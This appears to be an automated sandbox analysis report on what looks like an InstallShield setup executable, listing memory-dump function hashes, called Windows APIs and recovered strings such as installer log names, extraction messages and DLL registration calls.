• Opcode ID: 4df3d7d2938c552961260c112e0393b70111c7dea538a428ad612469a7b22709
• Instruction ID: dd704395b173d11368913ea49a614eed6fc5eaefedf0abae67e1876da9bfd6e4
• Opcode Fuzzy Hash: 4df3d7d2938c552961260c112e0393b70111c7dea538a428ad612469a7b22709
• Instruction Fuzzy Hash: 29F14871D01258EEDB20EBA9CC95BDEBBB8AF15304F5441AEE009B7281DB741E88CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00434C71
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• LoadCursorW.USER32(00000000,00007F02), ref: 00434CDA
• SetCursor.USER32(00000000), ref: 00434CE1
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
• SetCursor.USER32(?,00000000,?,?,?,?,00000001), ref: 00434F1C
  • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
  • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
  • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$Cursor$FreeH_prolog3_String$H_prolog3Loadwsprintfwvsprintf
• String ID: Extracting '%s' to %s$Extraction of '%s' failed$HsG$session.cpp
• API String ID: 1700565195-3068836811
• Opcode ID: 8b3d99bb21f297aa49e65c99c1b5ee2325f7c2a040c2f69d32f87a9ec5dcb687
• Instruction ID: 47b130e81680a4017e4b0987a9390e1bff45684eaba4973046eabc3720118841
• Opcode Fuzzy Hash: 8b3d99bb21f297aa49e65c99c1b5ee2325f7c2a040c2f69d32f87a9ec5dcb687
• Instruction Fuzzy Hash: 53919071900118EEDB14DBA0CC95BDDB7B4AF55304F1040AEE445B7191DBB86F88CFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempFileNameW.KERNEL32(?,_is,00000000,00000000,?,00000104), ref: 00457538
• GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 0045741A
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
• __EH_prolog3_GS.LIBCMT ref: 004573D7
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• DeleteFileW.KERNEL32(?), ref: 0045755D
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00457F57: __EH_prolog3.LIBCMT ref: 00457F5E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3$FileH_prolog3_StringTemp$AllocDeleteNamePath
• String ID: .tmp$HsG$HsG$_is
• API String ID: 2274788794-1593491402
• Opcode ID: c9fd242f252b6cf137be54d671611a44bb813da2993506407275415ebe84e19d
• Instruction ID: 43605242a3203fda11d6f8f6a33ea75ff43537e88c4c263b2126fa632526608b
• Opcode Fuzzy Hash: c9fd242f252b6cf137be54d671611a44bb813da2993506407275415ebe84e19d
• Instruction Fuzzy Hash: B0918F71900248EEDB15EBA0CC91BED7778AF14308F5040AEF949B71D2EB785B49CB69
Uniqueness

Uniqueness Score: -1.00%
                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045FC5E: __EH_prolog3.LIBCMT ref: 0045FC65
• _memmove.LIBCMT ref: 0045FA6D
• GetWindowDC.USER32(00000000), ref: 0045FA7D
• CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 0045FA92
• ReleaseDC.USER32 ref: 0045FAC3
• _memset.LIBCMT ref: 0045FAF6
• _memmove.LIBCMT ref: 0045FB03
• _memmove.LIBCMT ref: 0045FB17
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove$BitmapCreateH_prolog3ReleaseWindow_memset
• String ID: (
• API String ID: 3696145347-3887548279
• Opcode ID: 78d562634c56be6fa09653b691a3e4b71f1d15a1550c6d6960e09247489932ec
• Instruction ID: 64c65e59abd32d0e133353bb240de868eba41b9102c135dbc8d23c24359be117
• Opcode Fuzzy Hash: 78d562634c56be6fa09653b691a3e4b71f1d15a1550c6d6960e09247489932ec
• Instruction Fuzzy Hash: 767148B1D002189FDB14DFA5C845B9EBBF5FF08304F10416AE819E7242EB35A948CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00428C22
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_String
• String ID: Install does not use script$Install is basic with InstallScript custom actions$Install is script driven (ISMSI)$Install is script driven MSI 4.5 style embedded UI (ISMSI)$ScriptDriven$Startup$msiaction.cpp
• API String ID: 2608676048-4080540832
• Opcode ID: 79626fb230385e693edcd1394918e74e4fca901fbe6e7cc03b76a01f67097525
• Instruction ID: ad5a2d82dc55b4cbb194725caecb24b291642526057dbdae7947644be3e95696
• Opcode Fuzzy Hash: 79626fb230385e693edcd1394918e74e4fca901fbe6e7cc03b76a01f67097525
• Instruction Fuzzy Hash: 5571A030911258BEEB25E7A0CC55BEEB778AB14344F9401AFE145B30D1EBB85F88CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset$H_prolog3lstrcpywsprintf
• String ID: %s /g %s /g %s$%s /g %s /g %s /s
• API String ID: 103519269-3131057161
• Opcode ID: f2068c7e854fe2b4e082c4e8ea8452d09a134226448cf486acab4fd453ceb7e4
• Instruction ID: 6ae94a66c6c458ee2c63272d13abc270b7fd90245feae705321fb4a75bbb3428
• Opcode Fuzzy Hash: f2068c7e854fe2b4e082c4e8ea8452d09a134226448cf486acab4fd453ceb7e4
• Instruction Fuzzy Hash: D3518871E04258AFDB10EB64DC49FEB77B8EF15304F0045EBE409D72A1DB389A948B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00435CE3
• _memset.LIBCMT ref: 00435D0F
  • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
  • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
• wsprintfW.USER32 ref: 00435D4B
• CharNextW.USER32(?), ref: 00435D5E
• CharNextW.USER32(00000000), ref: 00435D61
  • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CharErrorH_prolog3_LastNext$H_prolog3_catch_memsetlstrcmpwsprintf
• String ID: %#x$Setup.bmp$Type
• API String ID: 539155021-465780282
• Opcode ID: 1f5c19871b582fbb153f4dc19c76c09b812bfce6f2edfc825eed891daff154a8
• Instruction ID: 5f42342d2d58e6f73128415084b29b66e1ddaba165bc7198fc77a26a90c0ce41
• Opcode Fuzzy Hash: 1f5c19871b582fbb153f4dc19c76c09b812bfce6f2edfc825eed891daff154a8
• Instruction Fuzzy Hash: A241F9B1A00318ABDB20EB71CC86EEF777CEB4A714F00559BB509A6181DA785B44CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004345A6
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
  • Part of subcall function 0042BE20: __EH_prolog3.LIBCMT ref: 0042BE27
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$FreeH_prolog3_String$H_prolog3
• String ID: IS_MINOR_UPGRADE=1$ REINSTALL=ALL$ REINSTALLMODE=vomus$HsG$IS_MINOR_UPGRADE$REINSTALL$REINSTALLMODE
• API String ID: 386487564-304950045
• Opcode ID: 9f0419de6705dc92d5bee2f9822d2402fde68fc7769a1b14ae4832fe4cf2b4b0
• Instruction ID: c40a303016965c9a25104b3401e9ed5b6c93e3c6928f1a74a01d11e4fa8d6b12
• Opcode Fuzzy Hash: 9f0419de6705dc92d5bee2f9822d2402fde68fc7769a1b14ae4832fe4cf2b4b0
• Instruction Fuzzy Hash: 6541B031900208AAEB14F6A1DC92BFE7378AB41718F64815FF015BB1D1DBBC2E45CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?,00000003,00000000), ref: 0045DA70
• wsprintfW.USER32 ref: 0045DAA4
• lstrcatW.KERNEL32(?,?), ref: 0045DAB8
• ResetEvent.KERNEL32(?,00000002,?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?), ref: 0045DAC7
• GetLastError.KERNEL32(?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?,00000003,00000000), ref: 0045DAD3
• ResetEvent.KERNEL32(0000000E,00000002,?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?), ref: 0045DB2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorEventLastReset$lstrcatwsprintf
                                                                                                                                                                          • String ID: Range: bytes=%d-$Range: bytes=%d-
                                                                                                                                                                          • API String ID: 2894917480-791809254
                                                                                                                                                                          • Opcode ID: ebd292b974d9b135799584cb63238d6066062b6ffa6f44b23d5b3eacd079b00f
                                                                                                                                                                          • Instruction ID: c0811adfebdd7188054b3ea2c0bc6590496823d125f2625714b7c46c8441b21e
                                                                                                                                                                          • Opcode Fuzzy Hash: ebd292b974d9b135799584cb63238d6066062b6ffa6f44b23d5b3eacd079b00f
                                                                                                                                                                          • Instruction Fuzzy Hash: DC415E71A04100EFDF259F54CC88A2B3BAAEF45702B1940AAFD058A267E735EC48DB19
                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004404DE
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
• _memset.LIBCMT ref: 00440503
• _memset.LIBCMT ref: 00440514
• CreateProcessW.KERNEL32 ref: 0044059A
• WaitForInputIdle.USER32 ref: 004405D5
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast_memset$CreateH_prolog3_IdleInputProcessWait
• String ID: Attempting to launch (no wait): %s$Launch result %d$utils.cpp
• API String ID: 3383204261-2306871107
• Opcode ID: 361aca7aa7c5668e817609f1717a6e6276b07806322b8bdf676a6293ed85faf9
• Instruction ID: 6f277134bf7db7eae0150f77a1c6482df15a31cc856bd7231d0bd62bd813138e
• Opcode Fuzzy Hash: 361aca7aa7c5668e817609f1717a6e6276b07806322b8bdf676a6293ed85faf9
• Instruction Fuzzy Hash: B93150B1D10218AFDB04EFA5CD46AEEBBBCEF14344F14406EF106B7191EA745A05CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: wsprintf$_memsetlstrlen
• String ID: %s%s$ftp://$http://$https://
• API String ID: 114250505-620530764
• Opcode ID: 58f1ece3e86ed6cdefbf1f32484111b66c7f71426f9b73eda306e4f8c1b5e2d3
• Instruction ID: fabe39ad54b87a79b382aaac31897d8ddb29fbc4b9f0f0c7b59bd71dd89ad4fb
• Opcode Fuzzy Hash: 58f1ece3e86ed6cdefbf1f32484111b66c7f71426f9b73eda306e4f8c1b5e2d3
• Instruction Fuzzy Hash: 34210C36940705AADB00AFA5CC86DDF7778EF45750B50402BF909FB181E6789D80C79C
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00404C70: GetLastError.KERNEL32(00000001,749AD5B0,CC858012,?,74B04D40,?,?,00471888,000000FF,HsG,00403CD4), ref: 00404CE4
  • Part of subcall function 00404C70: SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404D32
• GetLastError.KERNEL32 ref: 00403CE1
• SysFreeString.OLEAUT32(?), ref: 00403CFF
• SysFreeString.OLEAUT32(?), ref: 00403D0C
• SetLastError.KERNEL32(?), ref: 00403D36
• GetLastError.KERNEL32 ref: 00403D45
• SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 00403D9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG
• API String ID: 2425351278-815662401
• Opcode ID: bcde55c539f5cb98da283ca6dcf2819adc36ab9a9a3df555dbc32a5473944794
• Instruction ID: 7833fdf33f88805c2daa6f41fbdd71a98810f8c70320815feea399d870666dea
• Opcode Fuzzy Hash: bcde55c539f5cb98da283ca6dcf2819adc36ab9a9a3df555dbc32a5473944794
• Instruction Fuzzy Hash: EA315771508741AFD700DF29C984B1ABBE8FF88318F504A2EF458976A1D7B5E805CF8A
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,tempdisk1folder,?,00000000), ref: 0041BCF6
• lstrcmpW.KERNEL32(00000000,%IS_T%,?,tempdisk1folder,?,00000000), ref: 0041BD04
• _memset.LIBCMT ref: 0041BD67
• RegDeleteValueW.ADVAPI32(?,00000000,?,?), ref: 0041BDB4
  • Part of subcall function 004382A3: lstrlenW.KERNEL32(?,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218,0041C6E4,?,0000043C), ref: 004382AC
  • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382D3
  • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpy$CharDeleteNextValue_memsetlstrcmplstrlen
• String ID: %$%IS_T%$Software\Microsoft\Windows\CurrentVersion$tempdisk1folder
• API String ID: 1514787324-1686409532
• Opcode ID: 4b4e53fd542973aba0f7be9f1489c8f4db82d7abc0c53041a7d4b394e740c3b7
• Instruction ID: 0e35a17c36fbe4e4707e3ae2470e6d5fed16be83a0bf3acd8eefc6bda252b369
• Opcode Fuzzy Hash: 4b4e53fd542973aba0f7be9f1489c8f4db82d7abc0c53041a7d4b394e740c3b7
• Instruction Fuzzy Hash: 7131C230940658AADB28EB51CCD9BEE7678AF04348F0001EFB409B21E1DF785FC58E99
Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00458B0F
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00458B7E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00458B8F
                                                                                                                                                                          • RegOverridePredefKey.ADVAPI32(80000000,00000000), ref: 00458BE2
                                                                                                                                                                            • Part of subcall function 00458F45: GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                            • Part of subcall function 00454E9F: RegOverridePredefKey.ADVAPI32(80000000,?), ref: 00454ED7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00458BAA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Last$OverridePredef$AddressLibraryLoadProcVersion
                                                                                                                                                                          • String ID: DllRegisterServer$DllUnregisterServer$HsG
                                                                                                                                                                          • API String ID: 916470829-3778953661
                                                                                                                                                                          • Opcode ID: e1f8931952093f34fe6a29724dca1a251a437c3ec3e20ad3f639dfa12bf480b1
                                                                                                                                                                          • Instruction ID: 8d5360c3148e746e4eb84ea5d0da08369e5c0f33e7d49faedf27595deeded794
                                                                                                                                                                          • Opcode Fuzzy Hash: e1f8931952093f34fe6a29724dca1a251a437c3ec3e20ad3f639dfa12bf480b1
                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B460904245AAEB00EFB5C8157AE3B68AB11309F50846FBC59AA283DF78964DC719
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0041C391
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0041C35C,?,00000000,?,00000001), ref: 0041C3B3
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0041C3EE
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0041C40F
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000037,00000000,00000000,00000000), ref: 0041C436
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0041C444
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$ByteCharMultiWide$H_prolog3
                                                                                                                                                                          • String ID: HsG$m<H
                                                                                                                                                                          • API String ID: 1573742327-3913731857
